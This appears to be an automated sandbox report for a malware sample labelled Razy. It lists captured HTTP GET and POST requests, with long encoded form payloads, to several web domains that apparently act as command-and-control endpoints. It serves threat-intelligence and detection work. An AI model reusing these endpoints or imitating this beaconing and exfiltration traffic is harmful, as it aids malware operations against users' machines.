S6pUizcLPTRHVnw38uf47rVqnHLk1MXxM0m6zhFPfAfX7r(GnLhJk56ieBKAXIbQqw7C35y9E_aBzBvUfLOGfDH8uBER9SxQJbUX4H2YfUYHYjLau12SnD64qFzrNFvEslC21sKz7HanT_BVqVP5dFkwZOz6XYVP~WdJI16t4HnPQRGHuXP-hU3ILtCN2x0UNnRADjhdOmI7n0NJ60vDoGTl(MZOJdzjld9t5l(81J2PgnqO97arHag7600Oajbe5Gk-2XSe2TBP8yHGMdZzXg(4TA92K5s7e8u52pToikgLwIqgYA4QYDn1awDsjsgqX-TU2ZRiImUuNp9OKmtOEkoUo78MGhc9mDrjVcJsPmbYDrlPw8Z6vsPYDFaNmKB88-UR9CHdlX7QxBK1y_eCgN1JlsFnowVPQ-DmIcHGgtmZ50F6XaFzzgIjEspSnudoB9TnnBJYgCVFrYcvCa2iRvFkD8b7k2fdRZ4egHvhstpvzlWzbYpWViClDDVFn1NnE7HyYV4E(jPD8strlhjSlvZTaFNs2ZByQzeK7HZm3hwk41Svr2Cs5qn8ulTIvXctT5ho5-HXWTzj72U8(7bsgcUiyhKREpuDgHVt0dj9M0SgRIWJMAqPwx~Je9~_C_7BQeid83WCpilORptfitrP7KKRgI31YuOFCkuV3L2wxB7OuhV8tpeljTP6r0r5kZjIT6WziVm-H2oZxaIjps7L(gOhc_QhvGWF6MtPuPfTaUOXSFWpOPkjyLDe(0GAGeNlxhrtN8MibnHp8WriAZtXyXeizbSSIRrvrCAIF_2vfQHdKzszhMx9TqyZ0yp3D_VgWNbLaelRMLUsFwduyBq_Jiuf\x00\x00\x00\x00\x00\x00\x00\x00
http://www.spitcrack.com/ca/
- Hostname: www.spitcrack.com
- IP Address:
- Port: 80
- Count: 1
POST /ca/ HTTP/1.1 Host: www.spitcrack.com Connection: close Content-Length: 57169 Cache-Control: no-cache Origin: http://www.spitcrack.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.spitcrack.com/ca/ Accept-Language: en-US Accept-Encoding: gzip, deflate pPj0Qjn=yrpERkBiIElAKV2ltvAUw7QPMFGPQ0(HgEMT2v~CI92_nPv0rHGCB_C3f6UE3DHp3YqYOCcmD1SZcc~Seh4MIQmEdW78gY~BW3kVeaHBEyt3Nrv5uP1xpIjT46gRgR0ihVYfmFqzmoVhuq9luRHKXI88HSSR2TN9hRo09g(zyZc0b_Ao4Yqdux1yN1yKtdpC(j3kU04mmu~kzLsor3ybb3MpHr5cAIzSO5STNaZ7ObVS7rcbhK(huXF-yfBLAk44SjrwqT9q0viNxQnm~69Gzw3IDOZ2pfAXDY0tEluSLtrLO_z7CjyNsW~6Vkb1XRrSUkHqyRu13bDub_zHaxPiZnOZIWn3ANu_Y0QZ0POCgnkWHpVY8u0xgicnUyMlOgsYhLXUjJxggDa09aHY3u2WtgRDy_HKTlxKurPK1mDh8qQC1ualAeZGvbmTOToBpqbGpZ8CZvPummYT7FCxYgOtUW~-Lyx8cSOe~XmlwZWbJv(AqoZZSbzZxckhwiPDIfxHUlh9zn8lVYRIw3MlqdiNy203nkM1(wwEkoikJ9YyEoExP46efCBpk3QPGHfA9miFFy1ZEwWXxEUj5HBY~qnYWJn6jXbTbf3Aofy6YcXBE3OIIebeEqRU42anhi5LCqoHjDOGtp4LRchOoK78PVK5zspLT6xYJDlP1xiE251wmmXo92AW6Om4vdaOqFE3Q3YSvDM7Mq1JIJPvli1FTXTxnoDe38h7Uz4M9M0Yg72uhyrxNvIdIJ1_MofeywxThJkk~vMMK3nh714KqdF2UGNve6xH7FW3QrqhggDCrq0lfPvZz08vq0NKO2Wcx3mgIOKjYt~yby1LZ0oQG2g8LLKH39bJ9pF3tRZDQwgJLHFJiFkgajPXRwxki_lOOQjaF9CdEhFYG3cUA4Vo8Z9Trrl-sjEblhZl0zkR4EN7A310gQ2ugJ1TN9wmr4lZyfTOoSawmzD9ZTyZhaMxF443LgP1HM~UwxLBlH5I6Gnh~-VXKip_907ZlWJjA9~mYkd6QGlD0FCVzYTPbucwDqgQU5xlhjTPKtKr6B1Rmf1EIo~BUBgRRm6MJlUZ9-(dyLsiRdGnFnnPBS(7nUJJNdWRRt~j35isXMLCmJi4Ns5C(bK3DQoJZ-wsRx95Rq0VLysBVagnL0Jk73kQ7DrkridPNCR7FzaD5Y7KpLRM9ZDwkguUh3GbDhMuCNJpJ9MfYtYWnaoyfm2zIYiol1~BVspkt5o0AxtDHGBBeOPF7Qp0~Ljcgb(d2bdaQO50NWGzIsMsBkfS29QF3_G6ZoGAiIns(1VTCVXc8KttEv9cn20ZVqi4ZbZOKF4aTkdHZ48ChC8EGGBzGl1Pl6Wzy-9MikW96sfdJXTA7zQiDGXHpbaWmqYPmomqEgebf9nnk1ff0YSpGOXckQqgb5PWETrozhIW(xwUBLIf9Fi6EmwaRDH-lB2AhSeeh2nYOSzuvlDo8_7kj16nT_ZRwFLWd2AqYfyAf-hypG1yeTnExS~KYxCcq1LanzLUe6evoRNrZWANSwk-Zkk6iwlj8DLerQeCmIhOPu6Hp8s-4FngoImhmi2KoPmzHZE26UMVXTeX1Go_lDT9zzlc3S(dS8RbcR2dPDF2e7Y_UbeL(KXYjnIHl7CNTRs6NjThdmLgycAIVPWRx9VyPDIrJot-NGhsczAI4ZU5cxR7~22AZMJMf1X1CbYQw-Jfu7DfDFiCq75N(NEbwjWrkUjug2fm9_(J0vlguItwuxFKevH0duzdgM276VIbbK4FwxYxD_Jwo815NuWfkQAEpUwMwfNZGbWTTsZaO7j6l0XKb4BWt23ovPlBwk~hSfcsZHe8Fxl7g3ZkMLz0EBVg3zSN05pzijLVjOFTcktriJNgXQOm4HVZqkEY8HnaqRmX4LnTm0r_vTwjcph_4YDpexbo0Vwyzb~NrolM~CiTEZmDuCNL~IfQJzqbaaGvFAiswSCMOLy9ZYadbu3H8EWjsjY8Oc9S847V2KnbtIzjWLmUb0W9k5eYxADjjzhdpZSs(XLlqH3jnoOsQZqXljyOYTJm(7sCp9fn4l~uSdJA6XyC~ftgpfvxMluzSk6rLNUF5OTljwinFaVl(j3CNsg3cxLxr0PRDoYvtmS954eqCFLI0SETbpmNdQ60eShljuJIB6Su2V99Q_Y5XcihZqhCMecsFjk6gHGEZFnFc_~yHR3tVmIGi-Z4TUshBL(Iw-Tubo6bEAkAAISlvUCZ(ppsZ_Aw~OTBHY00aLAusjuiI4fv0l5IqR09vRtzG3jV8-bC(YjUvqYKm_XbDDteInQcrfkGMRMDAgBXhSI6MWWyOhwyQ-hgCKut5TPCKKC4nAMLS9ltVGzcnnveqqMMv-V6XDXvuQXYeb5shR6ZqWNlWuiJ~0VndIC27V15zrQDKwYxt6
http://www.patzcuarofurniture.com/ca/?pPj0Qjn=0t2srzISsm0KTVRh2cLxvtGOCTZ+QOQiCRo+e90xFQTLorSqHC1jPBT1+e3BjXEhYeZHdlYI&9r=fdfLudThQ
- Hostname: www.patzcuarofurniture.com
- IP Address:
- Port: 80
- Count: 1
GET /ca/?pPj0Qjn=0t2srzISsm0KTVRh2cLxvtGOCTZ+QOQiCRo+e90xFQTLorSqHC1jPBT1+e3BjXEhYeZHdlYI&9r=fdfLudThQ HTTP/1.1 Host: www.patzcuarofurniture.com Connection: close \x00\x00\x00\x00\x00\x00\x00
http://www.patzcuarofurniture.com/ca/
- Hostname: www.patzcuarofurniture.com
- IP Address:
- Port: 80
- Count: 1
POST /ca/ HTTP/1.1 Host: www.patzcuarofurniture.com Connection: close Content-Length: 2201 Cache-Control: no-cache Origin: http://www.patzcuarofurniture.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.patzcuarofurniture.com/ca/ Accept-Language: en-US Accept-Encoding: gzip, deflate pPj0Qjn=8P6W1WV_rkZ6OwJOpYi0s42-UDEiWdQmQRlaZOIDGD(3j4eLKmQqcnC8~pnR50k8ZdpefQ90kcJRKn(9LAY27uj-hYmunhFZ~25qkNQ05fFnDeaVoqaTwU7WAJoKZu6OKlSfg3EU42JAD-Fi6efOP0RwTJkGRFwF7lvQED9FeaFwkS7fIpbFTvDzmHCaA94wQh9KYZ44cKpJuOGvd4~bXehm0_eaoCotCI7YHhox0TyDpAXFiYxVqu2bwH71EsYekuk8RUVCdrQKiWasw0Onq5wTD07MiI41d4nXgxn6VhFVugMfZr7V8R9zsYwXzP59ayVAQlVhmMRyASI1uLhhim8wmAAHDLkZJ44aTTs-idGX9s~EuTrXkmrVHKij9VX0I3yAgiSFH7G73vtVe-5nqb~pA9yyA07NGtJGG-7H35CGe1CvHb(sEFp9uFooyTYdIeHfyWig9krNa-030yTik56QPdMGI4sSCVsgWFnXodl6n6D21tTvj9hC17aECcfIFYwc39QK(xk2XRnahgVqAjtIZrXRgQ1QxFbMHkX1nPPnGG6Su7Bo5PnuZ1asiR2V8_JCJ-1w8CquqNDzoi737N65eWO6EgqYobv20SS_f3RfV2w1KIpCPHQG1h~yWfN5kWti9QpLsxib9IQOZS3CzohunsdyK4qycaCrfTG3ramci3QWzgzS0z1Q9fXufFBx958tiU8hF9AhezlghhnSYkIhy6crr05t8pJpvIWxrteR0wwrgolXgGYmTudkTGdREeV38gyqXNeBwMyExS0zrr9gbSmAmrHAwbS4ncJIl2IXO1VtyPT2Ac0V9BBl1vzVOUgX9NjEJD0vkLh8KMs_x6nll0lzGp~rh2Dwl7YZ7mQkEYvZitXx8BRnd1blaW97eYz6xxSCRbHDaSkYC6ZgvmhqxvVLPKA-iHVRsz(es3TdwgdDDTIhRV(pSv~DdZjI~QTwDO4WFH4Dc9ABuEtpoMtYlfoK980xFclPeO9-g1J32iFfDeCEjWNUpzONow9bN7WCcaV2iMwKQMzAQTcEa16BRqbxSOqzPS1nuMv2nLbFQZQGNWTXnjLqrn7jzKVuX05-~kdOlifjebjWZuCdeW4RUaAIlyqhLX8QX6nanDEI3JZIo4~5CCqVx-1wnrob3Hb3y4~0T5vr5LDmqG60v5SVIgqEAxego6CYY56cpVMTrFn6JqACgPtJ~bdO63LTgr5T9CtrMzjzOr4hHUou5Hyp~YtCoj97wCBKoMqL9y40vOoxknpWXEv5kdT-SEBwW_nDogDTezwVZ0w9MyS-maTQslOTcGVLmgjhKZP6p2434qEmpY50hFGyqf3KPZwY~HnwWdto3aSot_iYCc1Da2X7iR~kWB5YvzTLH2OSnpFroBs_WkkxY1sxpg2wNpsedbB-zgrKvoiMYmqBAz1DR_l5WE9ZSr6RFJQsrviCRP(VsEYFOHDh7eyTt_7-PIbYfI0oA99FUdiMWTyPfmO7honYvE49gkrgWAslhs4EFEm8bIlXCS(1xbu5hUWcjGGTkDGSEu3PuiJ8tzsGox2QPeuyhOEt12mqiU7VCh2b1vxl4_Ub1-6yhdNCARPdZpzbdJVGL2PEyQ9rvTSioPRyOmOFMSR3eJhu7g0niYMRc-DxzhFxGNTXlosEK1RpFyEShxtC9GI95p~3rOm-Bl4urZ7wydvDTbM3zWPRt-4tSsLE1AOhMAAZ(Rct4TMrAZbIo4wDpKxBiD9f2lKjG99QCizBykmMymvFH9si4K10yZq7UhnFHGIwhttOGIphvgNvTIgE2MQgYkTLUw(Pmh23nLC8nXHxcwfgRq8vrY8VGMerMrv7zQ9_sk0jU4epLK1sndzHs2KriOi7gCH3l7QjLKchLF(TzHSA0w6GWtLCu1wRTPcE2-PiN0dAFgiFz9PcHa8-rsoAPK7u3NcwaX9qCOa4QDnEGJ2NVG92oYEwM1Rop_nrTdHfvITQO49Hif7ZOZ8X1mZXMQd0ekTFVlZCo3aOrkv8at15933pQK204vWCDWTqG-sR9PVVZce5IbVO3pVjl4~9XI9iNZEmFuHoiV4QnacIlafWKB~cw7G8z9R0GMtC9ch5E-RvuT60ZT9dFOkjcvGIbWt12huNUSnx0zQ6Uz86pjEUZfVArGXy60t9PukaYqyvqCcLgoXOhYdeWF8_04KUGgY2\x00\x00\x00\x00\x00\x00\x00\x00
http://www.patzcuarofurniture.com/ca/
- Hostname: www.patzcuarofurniture.com
- IP Address:
- Port: 80
- Count: 1
POST /ca/ HTTP/1.1 Host: www.patzcuarofurniture.com Connection: close Content-Length: 57169 Cache-Control: no-cache Origin: http://www.patzcuarofurniture.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.patzcuarofurniture.com/ca/ Accept-Language: en-US Accept-Encoding: gzip, deflate pPj0Qjn=8P6W1ThRtFs8K1lx7pzvzL~PMjAofqcZTGxoZNAHOhXhpIuLMk5sbHC74pnS90pBGeZofSRSkcRWAk3kKjxv4-uNt8O7jjNe(UFIyZM00PxlNtzRk7WH4U3uIoASX8D7YXeTpSI480ZHHfEs67LCLE1xdqYIQjs3~kvIZzUPQ4Z6vgD9Iof4HfSJ~2ahAOwgbBJKdoRjb6JHhpaNfp~qb-RPz_udmyJlBOnIaQck2S6HwiO6uYlgnd~m3Eb7F8E9ntQ0eWRxfYcG0TOYzVGvqJgpXkDMs5Yze7Pf~hmUGy1R3QMNZr2Z8mdBwowd9sdufSdifA5LlZ1yGwAm(5ZluG9olWgQIYASJ4oOSiU-hfiX5MuFoTrXuGrLHKi79VXNI0CMhiaFDL692Z5PWMltlb~lD5mSE1X1GupeI_THn_~ZV0yjPuLvOn1tllxzyTEUH_XpkCrsv0rMSuYojjSztLSlH-t-PYooD1ozYCTt6as7yOqDlLLznJkg3PqcHsCgE4UMxf0yuTl5XjvMslwzbCheRK3H3QF_mQicH0zbor(zLGmFqNB0yO~oNR~iwAmI3s5Bced19Cmxt8(MoAGUsPiNa2CHIBT3heiYz1mkMGNiPQktIedhf119~n~KQ-J8pSgp52lo(Cq-15ZxVXH-u7lOocRQHa6-BPyIYyrVv4qLuF8O~QfywTV2~MjEYkpJiNBX7DwWAs0ETnMR(hTpUDkYwrxmoGhU8pB1vYax5suRwzIkgJlcq2YkdOd4N2RnEc02yAmqAKyPxPqOnl8Eob9oZW(Rio~mwdiskc12oTUYL01pmvT1A50u2h9s7PD7OkVa3f3qd2g_yKh9YZMh16HflUosM9vUrWf2opBC1Ds4A7jWgsPphWdLUUCjfHoxTIC7hSe3Z4fMREwuCY1egDlJ~JZIMZ4e1nM7sTTg(kXP6BwCRjU5GRzuSemXe7HU5i3vLqlND3siNJgX5V1QpZBNk_s8iNs4OO9VFdNMmm5amWJJM6avtwB2oVeduRldY8mQVJdVgbwzS97SYElTKHrgTafAfrCTWgkso7rT0sj4Tq9TAX~4iEG9iVXC3rMxVEZ_z2MUmDHWdq3ED8fRYWAwWJMPh123LTYcXbjanzMI4-tIldPFISK9yMgRk_osyEP1wamVfMylzq(v8SS2~8K3PSmZVGGp7aKQeKK7pXsTrlKOPM0jhLETurla6kSMkZdHpiJWEg3lIs1abm0RsCmbu6ZpozN-vytAvKGy8jEOsuxrlh1PRErroNbsC0V5e9vdjwbKVE0BfH87IE62vbq56WTRTF4GjRLmO7PJj0YPwIBEgqQ3pCvgpuWbGKcVog2Cc_xyvbHXj8(bN5QkeTX0qDqcKGFilCmXEVeHmbxdrDRnYWEwbU0o(BKkC6JUavYE2SrrkJWYcS2GGSdNF_pmchtBLf~IcZcUp7nxd8Pv8io-C0jP1-yCnvDxHLrYfIssI-BqVsiKVBaYYlvbjs3Zlitxjl3qag4_yfNVKD7lSJl5cRf93Z2plQumyGuU2XuoGdHSvRBUiCQGqBW2G7yoitFy7nWI1m7BHhWT1tFi4fcEu-~5udJDGRvjcJniNZdDUnHVkR1JlBqiwrZ-V0qZDAU4dLJqyiBxoOt2dOPf7ThtNNzl7ppNOVpiWgMTwh5q(m1ct7izg8(-Ll0_jZHS(NuCS_0WzmL5t-xZBLPD1B2mExYc(nQdtnQ4SMOitbQvlJpF3CUB4HCWE4sWfAe93gbPyGTnHcses5hP8M3kFiGmIVwbnY19H5Q7pWprKKFw8pEdenO0TXXOliD1~fq7mjTodSzSSuUfhZ8zLqKIJdjv0Ul8mUpoXa~MfKZj4tbPr0isvcG72wP8mbMuPpdkIFzssmSKwFS8fvi0vUw-W_Ed2-HGGkdIJiSR5Y79M7gwiN9RE_SRwKs2UH1qIMuKU2ztBKa2YmU0v8gbNTNTv9nlJ8LN9oWSOJFmyN(IRPka(E5zDgh7RkHTSl0C9Hjrnmawaogn40PEHK6907~RT1P8HrN1vcokdr6FEpx2prYc(ImdUIpHOrcEU_zvlGUB2pEqhZXyJjLcqNjZ0vVXK8x109J5L4x6pCXOQhdVWJFdffD2f0I7g03qKmHGrzUhKg8Y4UlqSOZpqnrpw0M_NNMcEe2j0zxzv-3jn9QdfEhKiuGlEXphRKOEhvFMIy8-K2PqGfP1gSJ17XBfX3TPiHGL8I6bZ37Ca1L7zKrykpyvfHNFcrzySxPof3UiZ1jkYC7757IqUBTHCztR(q1RsgfqAqvEVZJpyjCF6BpcOyrL3_FlX7ql9nLtvv~I0jVw87IXMTxQLQEpYAzECojiu0aB26FMj3ZRBzozDmUfjWbgdnRkxHrJYwN
http://www.jianzhuxuexiao.com/ca/?pPj0Qjn=NwTBT7KtGKbBVpRgl5ySnwh3oIYgLYKoG035dq+CWi3M7IN3boYPtZDEQ4tNEKVwNjLzFGPH&9r=fdfLudThQ
- Hostname: www.jianzhuxuexiao.com
- IP Address:
- Port: 80
- Count: 1
GET /ca/?pPj0Qjn=NwTBT7KtGKbBVpRgl5ySnwh3oIYgLYKoG035dq+CWi3M7IN3boYPtZDEQ4tNEKVwNjLzFGPH&9r=fdfLudThQ HTTP/1.1 Host: www.jianzhuxuexiao.com Connection: close \x00\x00\x00\x00\x00\x00\x00
http://www.jianzhuxuexiao.com/ca/
- Hostname: www.jianzhuxuexiao.com
- IP Address:
- Port: 80
- Count: 1
POST /ca/ HTTP/1.1 Host: www.jianzhuxuexiao.com Connection: close Content-Length: 2201 Cache-Control: no-cache Origin: http://www.jianzhuxuexiao.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.jianzhuxuexiao.com/ca/ Accept-Language: en-US Accept-Encoding: gzip, deflate pPj0Qjn=FSf7Ne7fTaTEKMRChMrw3GhD~YIyCd2PSxayVPeTWAjt7q5mXO4GsenJcItMTtdobDXzAByLuUfLAsmZHnjEr1pFG_sA3Uk2xdGQFDnhG1no~UGzCBfOexA2DwuKmNDINZTSeAMgxETJ0Pz2vF77C8USUXznsc(2fb8tyk3SN0VzKNor7eEJOH7cllmWhhARnZdJT7eU4f2_aERj4zJ2i9dhR9pSQpo53xrygCdaooGw1IACvS4hu4DiSj7-uTPaLn(7jyOE2Q5pDBiSEmtRgBR7tbhdU8g-jP4A3Tr2g8u-HtyaYKGSF8vrETGR2OhKhJVW07nPeoz0bG4oCC(3JwBT2qIPquTVKP7OTa8mdesApVUcdXVanxOYQ96yEz~xGydageMKW8hn5GlLDbqYabVtr3VeBxxIa44Q1_aR~9U2DUdY6IsD7lWXOnGl6xr1ZfsBstE9sQi6RVTRorCFfpbCeLW22BvAj0aYEt5jQicrYogLiCkd5oScMcbJyDuzsXui(MEq(RhM(GZdSu9Votc9K_O5RNiiCbEc6jUUuLC1Dsblh81QY43BJdbi647w1-Z8RFz9XxQnrZUMSaISJPLA5BYXEGePd60RA5iIGyTVk6TGAI63zWAl1jAnZE4-AgnEe7VIYfppjlapvifoZMYvGZXOjgJuSjhU672zcYpgTH7MeuSEGUuomLnESxMskrD1Ffah5utj5TnDsdg6V7tic3bYrEZxL_qY1CGTu7pgDdURg2y6Q9QqQEFj(XEkkS0bUxylkEE_RG5QjhSB6cTpBLKuGz3toXdKFtYmarMkaKwIjkaDOT59u0NwLA8pHFNLfoZqBQUHCaBGXVaOIoRw7IJogIEBQOFGZVU6bfZuWH(YfL9oVf6gFv4LTwbJgx4oooeJOtbNptHhRbrgX0caJNi3(LefTzEVex8AVWi4GkCmbf7pHJctd9BX8K(8JOcKYHk6rx3hpLqiVvcTL8WC9U3Wkf81sFEPLwJ9fGBgZjtdbbsSzNJc7IRpmbDqDNHmXQUpnZZUQJbfiWkZSkaw(znpnzXI64hdOYeGYUYKOa1q47MZ59UYF_nxqg3kqhI5EbgEy3nx5UNC740-JrY83q9J9HIWZX(mZcxWq55ldGvw8OGFnhkOMJT0knX0dO01gZujpcxx(PCM6vZkDlomUG~M8h9FggygGeNG4W9c6vxsxJS44rIw0JdYuX~u4XVMYpgUqzdSYlvQ1g6j3fxxhaRuQE0GlmFkEWo0o1WW6X3yK_qMEjaCKC3DdXf-2pY6emKNInHdOMt59hXEIQnhKoKgWIGY8LX4PNHEnMraa_HxTLhhV6PqZdxsCyu_NZo0y9J6HTbq0_gPCELIoK(RM9mBpQr0(ovyHIpg3DlfFxAhTSdSq3k1awG2Ikgr(O0zFUJOY0C93Xq2eP7WnXTEF3LCZqoTCI49~Ftw79~7M6kGJN~YQpZMdVCCUuDdWpSuQqkWxioYc-JFuUIZOjIJlB3XmpPeTxfC5UjouxHwWERYZJtKeFCb2MW-VJhYuK3qx5(2MyO-DENp3h12kbUCmFuxVuGhPM0eAlOaFfjl0NjqN1~Mv2k9yqGFaWxzVht6TlIVpisBHKxEhjWDAyqYH4Rt8ST7Zb8bWlDpBqD1K8FllTRJhqc-t7rfHTsJQC38vZF1XJHucMtm67nyAJq2pmV9acu05MoaKIGukD7VPB6JpcQSga(iPolqI9QFynd07g~GVVC9MG3RrGUYk19alK6kk8I8Tg4AjEVsD9L0Stc0TPtINo1GJMoY87AiNuv5w5UsYU4rWoVkYbH7qlzmEbrJHWvvFiaaVJWuHWkVPNpDLWBYulDfblWybccAhVMsE_WvpG2_r4aAiEUpbLtcpEo2vy98nzT9~Skbxxcp2qbBmP3sgLutw3X2l3~KjM(Mt1hQ2kiET7qhtSviFgrDppTvwntjDRKQ570VQwiN0kqPTvqKxtSsRC8QL_myOyA_bc0dKTETIym9BfnpaBEVujJ8QGAmcNfCxYyb8x57cP54NDSWYve8oTFM5SPvSBAr97eIpUL-xEn9QIme3mU7haON7IwBZuyL4_Nu6rcNNEuyI6dV1GoaoU4p2a2l~irOC7wdWvROfE1mgLRg8OVYR9aVAFLobJvmtYJHk94-SurU2iFBiYSAhTsuutBFsJgB0PPorH0h\x00F8_04KU
http://www.jianzhuxuexiao.com/ca/
- Hostname: www.jianzhuxuexiao.com
- IP Address:
- Port: 80
- Count: 1
POST /ca/ HTTP/1.1 Host: www.jianzhuxuexiao.com Connection: close Content-Length: 57169 Cache-Control: no-cache Origin: http://www.jianzhuxuexiao.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.jianzhuxuexiao.com/ca/ Accept-Language: en-US Accept-Encoding: gzip, deflate pPj0Qjn=FSf7NcbteKXVBt9XlOTe5GRQm48oc7ewbB6QVPOXdhz_qbpmRMgB2unIXotDE4EfWxH7AA2xuSHEW-OBPkbflFlTJfIZhmc3w7OEV37hZ1jq6Hv3PQTScVY0WEyx9PL1M7(WZEZP6h3C4KPSunbNd8ARfwjhv9yReeI1uUvFHVhtB_hU7a91JGrl9SCH~CYn0IVJVPaEgN~9ETNF7gxLqtMNS_xVOtc-2DC19wxhlJOGgvk2oy8QjLrPVknnuH3DfFbzt2eW3mVlMxCEABNJhxgen4BdO8Ak3sQI5Tqai82IJNztYKKaX_ySIzHYus1VxZNO~fiQfZj0alh0EAnyDQAJ(aYYuZrcKPrSSqkmccIA~FEffXVayhOWQ966Ez~cG0pWhaUKU8dp70tVXeqgY7VxszJEQhsGa_s27_2R5Mw3IVNUqKECwBq5FBeP6xnwae8doPQs~Qi5ZFOKspmjSYHrcKeN0xrmiS2DENRVRl8_ZY0xn08v6cb8Ic3ntCSijT(az-wW5XkC(Q8lSLdJ08xJCYWvasSdGvY97ywI246bNsH-ooJyKtbyd7DzqNfx8pdxZUbCHhN38YJ4T408fcjo5hs2InW9KIkhWumtXFz888mVI5Wf20If8gk1QFM_LljCBORjd_J2vUTcjnnIE_cTHN(8igBbYiE6~YiSWakDKGvuXfekD0OOhZelf05_oqrgA42g68AT4Ba6iP9kcsBHCXLqrXAlL_yu1yKTt4lgSuQSgRG3aNQzUEF_y34CkREHVxmliy85SFRapRm9ksTbDP6lMQ~LoVRkGs0ceoMrfOoMvEaAIyFW(UBDWRMPE1JlNZlDQFBKEN9DHk~VMoxe6oFA6p4mYupAXCoqDKg8K0TIdOZza8CLLOgQZBfmz0E0jYrzWbXKm6GGW5HCIEQxVe6kx5XnUDN1fQpRbAymPFuIdOW0DYEqdI1D9vXwYMpIQiMWnhj-uJe0fIU6Ip6p60jCs9N7iWNONBRmZVBdJWBxZbBM3P5q6thXg-XWPaOffHBVrqlhc-Hn2Uo1VXaE5zidm2(kn6BmMo3udH07NoYhgvQ9quIuCp(cmhv03DBxIJAN(2v-6lp-y4AaALwR1bVS5A8cZTjEY8VWpJBlcU3wo_r5qwpDN-zItWjlM8A3h_C8rOJ47K7cmOxEVHcEQ2aF1HdMkRmWOJI04Qpc5OtT1qmZ(q14i4VEhne5pz4WDqcpxTt2eirz5Gyc4sBDtLsySUETrVwZDVQ7oguG7zLnEdy7IzvHfBnVbXLZ~p5_R2~KDQj3GbV_un2JCUqCBqW1TqqQ56j7S7zniv6lY9jWDOF3BorLapFnIgifKqc98vV4OCPIwfFGJlzg28n0S-C1hhGP1crjJL4u1SpXdS8IMwsuqWcNKUz3PGZhuPAdBmlvTQyTqXexdr(D(3OobBDaMb4CbY9QskBi6u(eIpQfMePJVpYVXEnDfqzdWt2UcqxUwRMScvI_5gw0ZzgE3T(zltOZfRKAqHXcpXDkdH4iXZ0_XhGLyMDpfZJZ~biPyKfdNCvTM0BpkhVDq_Y6kkHuRfWLNO0CFmHXFdHi0ta0VVqPrWh_wqnUMiJGARl_c191iXInMftE7mOHOlSMYLFn9R7_XdFbc0GMBZnhMpEmkyx39ro47rSEMVoGUCjciZBfeJDcZaRXnLrvUc2Yl2VdJsKJ48UIKJOPjU(SPD6KhvcngovgJsoUarE72GFU3geCATGiGk(oimkdpnRuppC8q5keenM8lHxHFPjieaAJcaZjLag6I4cZ1t8-Sd6D07NUaT4jfrBfbZ(ogEfhFonUGw37Enf5fO6MfkdRJ_o6KXdZmVfZH0OXD8wPpFk0Uo6srza_ubSLkkp2frFGoEkCwz9ytiPL2RsozVIG(7j2mMHirbuP2S7IuSqrptjW3k0B5V~hU5CnzxPiKmigtdPSlUBIJxSMvr9lCDeMjWqJa-2Y09WDRTlyO-a7TAMyHqsDXUESAxbjTObeUx9AvGkRQEA1B_aQ8JOehQBsd4QWCyPKaJPQtSNe6A7XPQkK8rCGoUf1uV7AbI6d8lVvhKejsYRCaMmRndcLwpYuB0yFFYdVh3cDuFVR(p295VS-Pq0mSLBKWitesbNHyeh9feqjImfaVYz1ieFYidYJSNTWnxVb7IvCgnlHpalHq60FoaDEkS5LlwmX67qclLAnc5k3Q8Nk4yFTaQDRlpYoNKY7BBXC2l1ccR6Hpp5u2EjN5ATqEDoxLotVdJtQ41eyIUqw56s3cxNNynp_wbUU79KXHrmzolguGWfUrFlWv2EjRCU7bUI4aVgJizryGyQMuDGxmX7DmSmnXnkVXU8GRR3xF45YmaMOB1WM0g~rdY6iKEkCz94TwxtrZyvL2hif(Ya
Detected family: #Razy
TheSystem Itself @ 2018-11-21 10:06:02
#infosec #automation
TheSystem Itself @ 2018-11-21 03:39:08